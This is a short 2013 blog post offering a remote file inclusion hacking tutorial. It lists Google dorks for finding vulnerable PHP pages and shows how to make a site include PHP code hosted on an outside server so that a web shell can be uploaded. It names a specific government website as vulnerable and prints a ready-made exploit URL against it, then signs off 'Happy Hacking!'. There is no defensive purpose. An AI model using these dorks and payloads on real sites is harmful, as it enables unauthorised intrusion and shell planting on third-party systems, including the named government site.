Saturday 31 August 2013

Remote File Inclusion

RFI tutorial is very easyOld Method But Useful

Just use php code inside txt code in website

http://www.april.co.id/x.txt <-- like this link

Entering File Inclusion dork

Dork Example :-

inurl:.php?pg=(*)php
inurl.php?text=(*)php
inurl:.php?(*)=news.php
inurl:.php?(*)=contact.htm
inurl:.php?(*)=contato.html

copy and paste at google search
find some website and replace the link infront of " = "

example:-

www.site.com/index.php?pagina=http://www.april.co.id/x.txt

Then upload the shell

path shell :-

www.site.com/youruploadedshell.php

Webvuln RFI :- http://www.electricity.gov.gy/policies.php?id=energy2.txt

http://www.electricity.gov.gy/policies.php?id=http://www.april.co.id/x.txt

Happy Hacking! From Eagle Eye

0 comments:

Post a Comment